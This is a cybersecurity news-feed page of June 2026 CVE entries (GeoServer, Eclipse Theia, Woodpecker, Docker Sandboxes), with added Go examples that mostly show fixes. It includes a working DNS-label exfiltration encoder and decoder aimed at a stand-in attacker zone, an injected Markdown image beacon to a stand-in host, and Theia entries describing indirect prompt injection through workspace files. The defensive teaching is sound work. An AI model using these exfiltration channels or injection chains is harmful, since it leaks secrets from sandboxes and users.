Cybersecurity & EU Regulation

News & Security

Updates from ENISA, NVD and the main European cybersecurity sources. Everything a technical lead needs to know.


Vulnerability: High
CVE-2025-52465 - GeoServer has an arbitrary file write vulnerability in its Master Password Dump Page

CVE ID: CVE-2025-52465
Published: June 18, 2026, 2:28 p.m.
Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to versions 2.26.4 and 2.27.3, a vulnerability exists that allows an authenticated administrator with access to GeoServer's security system to pass arbitrary file names to the Master Password Dump web page and create files containing the master password in plaintext. The provided file name must be an absolute path to the target file, the target file can not already exist and all parent directories must already exist. Versions 2.26.4 and 2.27.3 contain a fix. GeoServer installations where the web interface is either disabled or completely removed are not affected since the vulnerability exists in one of the web pages.
Severity: 0.0 | NA

CVEfeed CVE, 18 Jun 2026
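The GeoServer entry above is the classic shape of an arbitrary-file-write primitive: the endpoint already refused to overwrite an existing file, but it let the caller choose an absolute path, so the only thing between an admin session and a new file in, say, a cron or web-root directory was the "must not exist" rule. The Go code below is an added example, not GeoServer's code (GeoServer is Java), of how a "dump secret to file" endpoint should confine its target: a server-fixed directory, a caller-supplied bare basename only, symlink resolution before the containment check, and O_EXCL so that "must not already exist" is enforced atomically by the kernel rather than by a check-then-write. The function names, the base-directory argument and the 0600 mode are assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// safeDumpPath returns the only path a caller may write to: <baseDir>/<requested>,
// where requested must be a bare file name. Illustrative code, not GeoServer's;
// baseDir is chosen by the server, never by the client.
func safeDumpPath(baseDir, requested string) (string, error) {
	// Reject anything that is not a plain basename: separators, "." and "..".
	if requested == "" || requested == "." || requested == ".." ||
		requested != filepath.Base(requested) || strings.ContainsAny(requested, `/\`) {
		return "", fmt.Errorf("invalid file name %q: must be a bare basename", requested)
	}
	absBase, err := filepath.Abs(baseDir)
	if err != nil {
		return "", err
	}
	// Resolve symlinks in the base so the containment check compares real paths.
	realBase, err := filepath.EvalSymlinks(absBase)
	if err != nil {
		return "", fmt.Errorf("base directory unusable: %w", err)
	}
	target := filepath.Join(realBase, requested)
	// Belt and braces: the joined path must still sit directly under the base.
	if filepath.Dir(target) != realBase {
		return "", errors.New("path escaped base directory")
	}
	return target, nil
}

// writeSecretFile creates the file with O_EXCL: if it already exists the call
// fails, so "target must not exist" is decided by the kernel at create time
// rather than by a racy stat-then-write. 0600 keeps the plaintext secret
// readable only by the service account (the mode is an assumption here).
func writeSecretFile(target string, secret []byte) error {
	f, err := os.OpenFile(target, os.O_WRONLY|os.O_CREATE|os.O_EXCL, 0o600)
	if err != nil {
		return err
	}
	defer f.Close()
	_, err = f.Write(secret)
	return err
}

func main() {
	base, _ := os.MkdirTemp("", "dump")
	defer os.RemoveAll(base)
	for _, name := range []string{"master.txt", "/etc/cron.d/job", "../escape", ".."} {
		p, err := safeDumpPath(base, name)
		if err != nil {
			fmt.Println("rejected:", name, "->", err)
			continue
		}
		fmt.Println("accepted:", name, "->", p)
		// Constructed placeholder secret; a second call on the same path fails.
		fmt.Println("write:", writeSecretFile(p, []byte("constructed-master-password")))
	}
}
```

The O_EXCL open is the important half: a separate "does it exist?" check followed by a plain create can be raced with a symlink dropped in between, whereas the exclusive create either makes a brand-new regular file or fails.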
Vulnerability: High
CVE-2026-46580 - In Eclipse Theia versions prior to 1.71.0, files m

CVE ID: CVE-2026-46580
Published: June 18, 2026, 2:26 p.m.
Description: In Eclipse Theia versions prior to 1.71.0, files matching the pattern .prompts/*.prompttemplate in a workspace were automatically loaded and could override or extend the AI agent's system prompts. An attacker could craft a malicious repository containing prompt template files that, when the workspace was opened in Theia, replaced the AI's system instructions with attacker-controlled content (indirect prompt injection). Combined with other AI chat features available in untrusted workspaces, this enabled attack chains leading to data exfiltration via Markdown image rendering or arbitrary command execution via task definitions.
Severity: 8.4 | HIGH

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2025-27511 - GeoServer DB2 DataStore Extension has a JNDI Vulnerability via Store Connection

CVE ID: CVE-2025-27511
Published: June 18, 2026, 2:23 p.m.
Description: GeoServer is an open source server that allows users to share and edit geospatial data. Prior to version 2.27.0 of the GeoServer DB2 DataStore Extension, an administrator can perform a JNDI attack through a specially crafted DB2 JDBC URL, leading to Remote Code Execution (RCE). Version 2.27.0 fixes the issue.
Severity: 0.0 | NA

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2026-44688 - Eclipse Theia Indirect Prompt Injection

CVE ID: CVE-2026-44688
Published: June 18, 2026, 2:22 p.m.
Description: In Eclipse Theia versions prior to 1.71.0, the AI chat agent processed workspace file and directory names as part of its prompt context without distinguishing them from system instructions. An attacker could craft a malicious repository with adversarial directory or file names that, when analyzed by the AI agent, would cause the agent to follow attacker-controlled instructions (indirect prompt injection). Combined with other AI chat features available in untrusted workspaces, this enabled attack chains leading to data exfiltration via Markdown image rendering or arbitrary command execution via task definitions.
Severity: 8.4 | HIGH

CVEfeed CVE, 18 Jun 2026
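Both Theia entries end in the same two sinks: Markdown image rendering, where the model's output makes the client issue an outbound HTTP request whose URL is the exfiltration channel, and task definitions that run commands. The renderer-side control for the first sink is small, and is shown here as an added Go example, not Theia's code (Theia is TypeScript): before model output is rendered, every image reference is checked against an allowlist of hosts and anything else is replaced with an inert placeholder. The allowlist, the placeholder text, and the choice to keep workspace-relative image paths are assumptions of the example.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// mdImage matches ![alt](url) and ![alt](url "title") in Markdown.
var mdImage = regexp.MustCompile(`!\[([^\]]*)\]\(([^)\s]+)(?:\s+"[^"]*")?\)`)

// hostAllowed accepts an exact allowlisted host or a subdomain of one.
// "docs.example.evil.example" is NOT a subdomain of "docs.example".
func hostAllowed(host string, allowed []string) bool {
	host = strings.ToLower(host)
	for _, a := range allowed {
		a = strings.ToLower(a)
		if host == a || strings.HasSuffix(host, "."+a) {
			return true
		}
	}
	return false
}

// sanitizeMarkdownImages rewrites model output so the renderer only fetches
// images from allowlisted https hosts. Relative paths (no scheme, no host) are
// kept because they resolve inside the workspace and cause no network request;
// everything else, including data:, http: and protocol-relative URLs, becomes
// a placeholder. Returns the rewritten Markdown and the blocked URLs for logging.
func sanitizeMarkdownImages(md string, allowedHosts []string) (string, []string) {
	var blocked []string
	out := mdImage.ReplaceAllStringFunc(md, func(m string) string {
		sub := mdImage.FindStringSubmatch(m)
		alt, raw := sub[1], sub[2]
		u, err := url.Parse(raw)
		if err == nil && u.Scheme == "" && u.Host == "" {
			return m // workspace-relative image, no egress
		}
		if err == nil && u.Scheme == "https" && hostAllowed(u.Hostname(), allowedHosts) {
			return m
		}
		blocked = append(blocked, raw)
		return fmt.Sprintf("[image blocked: %s]", alt)
	})
	return out, blocked
}

func main() {
	// Constructed model output: one benign image and one injected exfil beacon
	// carrying a (fake) secret in the query string.
	md := "Summary of the repo.\n\n![logo](https://docs.example/logo.png)\n\n" +
		"![status](https://collector.attacker.example/p?d=c2VjcmV0)\n"
	clean, blocked := sanitizeMarkdownImages(md, []string{"docs.example"})
	fmt.Println(clean)
	fmt.Println("blocked:", blocked)
}
```

The same allowlist should be enforced wherever rendered content can trigger a fetch (link previews, remote stylesheets, badges); the regex above covers only the Markdown image syntax the advisory names.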
Vulnerability: Critical
CVE-2026-8024 (CVSS 9.8)

A remote, unauthenticated attacker may exploit a deserialization of untrusted data vulnerability in ibaPDA or ibaDatCoordinator to gain full access to the affected systems.

NVD (NIST), 18 Jun 2026
Vulnerability: High
CVE-2026-50141 - Woodpecker gRPC agent_id metadata can be spoofed: cross-tenant agent impersonation

CVE ID: CVE-2026-50141
Published: June 18, 2026, 2:13 p.m.
Description: Woodpecker is a CI/CD engine. Starting in version 3.0.0 and prior to version 3.14.1, a vulnerability in Woodpecker CI's gRPC layer allowed any authenticated agent to impersonate any other agent on the same server by injecting a forged `agent_id` value into outgoing gRPC metadata. The server correctly verified the JWT token but then discarded the verified agent identity in favor of the client-supplied value. Version 3.14.1 patches the issue. As a workaround, disable org agents (`WOODPECKER_DISABLE_USER_AGENT_REGISTRATION=true`) and delete existing ones.
Severity: 0.0 | NA

CVEfeed CVE, 18 Jun 2026
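The Woodpecker bug is an authentication-then-authorization mismatch that is easy to reproduce in any RPC server: the token is verified, but the identity used afterwards is read back from a field the client controls. The Go code below is an added example, not Woodpecker's code, showing the two resolution paths side by side over a minimal HS256 JWT. The shared secret, the claim names, and the metadata keys `token` and `agent_id` are assumptions of the example; the point is that the only acceptable source of the agent identity is the verified claim set, and a client-supplied `agent_id` is at most compared against it and rejected on mismatch.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/base64"
	"encoding/json"
	"errors"
	"fmt"
	"strings"
)

// Constructed server-side secret for the demo; a real deployment would use a
// per-server random key. Key and algorithm are fixed here, so alg:none and
// key-confusion tricks do not apply to this verifier.
var serverSecret = []byte("constructed-demo-secret")

// agentClaims is the assumed claim set: the identity the server minted.
type agentClaims struct {
	AgentID int64  `json:"agent_id"`
	Type    string `json:"type"`
}

func b64(b []byte) string { return base64.RawURLEncoding.EncodeToString(b) }

// signToken mints an HS256 JWT for the given agent (what the server does at registration).
func signToken(claims agentClaims) string {
	header := b64([]byte(`{"alg":"HS256","typ":"JWT"}`))
	body, _ := json.Marshal(claims)
	signingInput := header + "." + b64(body)
	mac := hmac.New(sha256.New, serverSecret)
	mac.Write([]byte(signingInput))
	return signingInput + "." + b64(mac.Sum(nil))
}

// verifyToken checks the MAC over header.payload and returns the protected claims.
func verifyToken(token string) (agentClaims, error) {
	var c agentClaims
	parts := strings.Split(token, ".")
	if len(parts) != 3 {
		return c, errors.New("malformed token")
	}
	mac := hmac.New(sha256.New, serverSecret)
	mac.Write([]byte(parts[0] + "." + parts[1]))
	sig, err := base64.RawURLEncoding.DecodeString(parts[2])
	if err != nil || !hmac.Equal(sig, mac.Sum(nil)) {
		return c, errors.New("bad signature")
	}
	payload, err := base64.RawURLEncoding.DecodeString(parts[1])
	if err != nil {
		return c, err
	}
	if err := json.Unmarshal(payload, &c); err != nil {
		return c, err
	}
	return c, nil
}

// metadata mirrors gRPC metadata: header key -> values, entirely client-supplied.
type metadata map[string][]string

func first(md metadata, k string) string {
	if v := md[k]; len(v) > 0 {
		return v[0]
	}
	return ""
}

// resolveAgentIDVulnerable verifies the JWT, then throws the verified identity
// away whenever the client also sent an agent_id header: the bug pattern.
func resolveAgentIDVulnerable(md metadata) (int64, error) {
	claims, err := verifyToken(first(md, "token"))
	if err != nil {
		return 0, err
	}
	if v := first(md, "agent_id"); v != "" {
		var id int64
		if _, err := fmt.Sscan(v, &id); err == nil {
			return id, nil // trusts the client: any agent can claim any id
		}
	}
	return claims.AgentID, nil
}

// resolveAgentIDFixed derives identity only from the verified token; a
// client-supplied agent_id that disagrees with it is an error, not an override.
func resolveAgentIDFixed(md metadata) (int64, error) {
	claims, err := verifyToken(first(md, "token"))
	if err != nil {
		return 0, err
	}
	if v := first(md, "agent_id"); v != "" && v != fmt.Sprint(claims.AgentID) {
		return 0, fmt.Errorf("agent_id %q does not match authenticated agent %d", v, claims.AgentID)
	}
	return claims.AgentID, nil
}

func main() {
	tok := signToken(agentClaims{AgentID: 7, Type: "agent"})
	md := metadata{"token": {tok}, "agent_id": {"42"}} // forged agent_id from agent 7
	v, _ := resolveAgentIDVulnerable(md)
	_, fixedErr := resolveAgentIDFixed(md)
	fmt.Printf("vulnerable resolves to agent %d; fixed: %v\n", v, fixedErr)
}
```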
News
INC Ransomware Emerges as Major RaaS Threat in 2026 with 830+ Victims Since 2023

Cybersecurity researchers have charted the evolution of INC from a nascent ransomware-as-a-service (RaaS) operation to one of the most prolific cybercrime groups in 2026, claiming no less than 830 vi ...
Published Date: Jun 18, 2026
Vulnerabilities mentioned in this article: CVE-2026-11645, CVE-2025-5777, CVE-2024-57727, CVE-2023-48788, CVE-2023-3519

CVEfeed Newsroom, 18 Jun 2026
Vulnerability: High
CVE-2026-9158 - 4diac FORTE Use-After-Free Vulnerability

CVE ID: CVE-2026-9158
Published: June 18, 2026, 2:10 p.m.
Description: In Eclipse 4diac FORTE versions 3.0.0 to 3.1.0, a specially crafted DELETE connection command to the management interface can lead to a dangling pointer. This allows subsequent commands to access freed memory (use-after-free).
Severity: 5.2 | MEDIUM

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2026-56012 - WordPress Media Library Assistant plugin <= 3.35 - SQL Injection vulnerability

CVE ID: CVE-2026-56012
Published: June 18, 2026, 2:02 p.m.
Description: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media Library Assistant allows Blind SQL Injection. This issue affects Media Library Assistant: from n/a through 3.35.
Severity: 8.5 | HIGH

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2026-12527 - A broken authorization boundary in the RTSP media

CVE ID: CVE-2026-12527
Published: June 18, 2026, 1:55 p.m.
Description: A broken authorization boundary in the RTSP media delivery pipeline of Shenzhen Liandian Communication Technology LTD V380 IP Camera firmware AppFHE1_V1.0.6.020230803 enables unauthenticated network actors to bypass the device's credential-enforced live-view workflow and directly retrieve real-time video stream data.
Severity: 6.0 | MEDIUM

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2026-12539 - Docker Sandboxes ICMP egress restriction bypass after daemon restart

CVE ID: CVE-2026-12539
Published: June 18, 2026, 1:51 p.m.
Description: Docker Sandboxes (sbx) blocks ICMP egress with an authorizer applied only at network-creation time, and does not re-apply it to networks rebuilt from disk when the Docker daemon restarts, so a restart-surviving sandbox forwards ICMP to arbitrary hosts. A workload inside a sandbox, which the threat model treats as untrusted, can therefore defeat the documented ICMP egress block to perform network reconnaissance and exfiltrate data over an ICMP covert channel, regardless of the configured allowlist.
Severity: 5.7 | MEDIUM

CVEfeed CVE, 18 Jun 2026
Vulnerability: High
CVE-2026-12039 - Docker Sandboxes network egress allowlist bypass via unfiltered DNS resolution

CVE ID: CVE-2026-12039
Published: June 18, 2026, 1:48 p.m.
Description: Docker Sandboxes (sbx) enforces an HTTP/S-only egress allowlist but does not apply it to DNS resolution: the per-network embedded DNS server forwards any queried name to the host resolver whenever the network is internet-connected, without consulting the policy. A workload inside a sandbox, which the threat model treats as untrusted, can therefore encode data into DNS labels for an attacker-controlled domain and exfiltrate it through a DNS covert channel, bypassing the configured allowlist.
Severity: 5.7 | MEDIUM

CVEfeed CVE, 18 Jun 2026
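The Docker Sandboxes DNS entry is the general failure mode behind most egress-allowlist bypasses: the policy sits on one path (HTTP/S) while a second path (the embedded resolver) forwards unconditionally. The Go code below is an added example, not Docker's sbx code, showing both halves: how an untrusted workload encodes bytes into DNS labels under a zone it controls, and a resolver model that either forwards every query or refuses names the allowlist would not permit. The zone, the allowlist entries, the payload and the policy format are constructed assumptions.

```go
package main

import (
	"encoding/base32"
	"fmt"
	"strings"
)

const maxLabel = 63 // RFC 1035: a single DNS label is at most 63 octets

// Unpadded base32 keeps every character DNS-safe and case-insensitive.
var b32 = base32.StdEncoding.WithPadding(base32.NoPadding)

// encodeExfil turns data into ordered query names "<seq>.<chunk>.<zone>",
// one chunk per label so each name stays within the label limit.
func encodeExfil(data []byte, zone string) []string {
	enc := strings.ToLower(b32.EncodeToString(data))
	var names []string
	for i := 0; i < len(enc); i += maxLabel {
		end := i + maxLabel
		if end > len(enc) {
			end = len(enc)
		}
		names = append(names, fmt.Sprintf("%d.%s.%s", len(names), enc[i:end], zone))
	}
	return names
}

// decodeExfil is what the attacker's authoritative server does with the
// queries that reach it for its zone.
func decodeExfil(names []string, zone string) ([]byte, error) {
	var sb strings.Builder
	for _, n := range names {
		labels := strings.Split(strings.TrimSuffix(n, "."+zone), ".")
		if len(labels) != 2 {
			return nil, fmt.Errorf("unexpected query name %q", n)
		}
		sb.WriteString(strings.ToUpper(labels[1]))
	}
	return b32.DecodeString(sb.String())
}

// egressPolicy is the sandbox allowlist (assumed format: bare host names).
type egressPolicy struct{ allowed []string }

// permits is true for an allowlisted name or a subdomain of one.
func (p egressPolicy) permits(name string) bool {
	name = strings.TrimSuffix(strings.ToLower(name), ".")
	for _, a := range p.allowed {
		a = strings.ToLower(a)
		if name == a || strings.HasSuffix(name, "."+a) {
			return true
		}
	}
	return false
}

// forwardQueries models the embedded resolver. With consultPolicy=false every
// name goes to the host resolver (the reported behaviour); with
// consultPolicy=true a name the HTTP/S allowlist would not permit is never
// resolved, so it can never carry data off the host.
func forwardQueries(p egressPolicy, names []string, consultPolicy bool) []string {
	var forwarded []string
	for _, n := range names {
		if consultPolicy && !p.permits(n) {
			continue // answer REFUSED/NXDOMAIN locally instead of forwarding
		}
		forwarded = append(forwarded, n)
	}
	return forwarded
}

func main() {
	zone := "x.attacker.example"
	policy := egressPolicy{allowed: []string{"pypi.org", "files.pythonhosted.org"}}
	// Constructed payload; long enough to need two query names.
	queries := encodeExfil([]byte("constructed secret: db password = hunter2"), zone)
	leaked := forwardQueries(policy, queries, false)
	got, _ := decodeExfil(leaked, zone)
	fmt.Printf("unfiltered resolver: %d queries forwarded, attacker recovers %q\n", len(leaked), got)
	fmt.Printf("policy-aware resolver: %d queries forwarded\n", len(forwardQueries(policy, queries, true)))
}
```

Consulting the policy in the resolver closes this channel, but queries for allowlisted zones still leave the host and reach those zones' nameservers, so a label-length or query-rate limit is a reasonable second layer for sandboxes whose threat model treats the workload as hostile.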


Stay up to date on cybersecurity

Subscribe to CodersRegistry to receive the most important updates on EU regulation and critical vulnerabilities.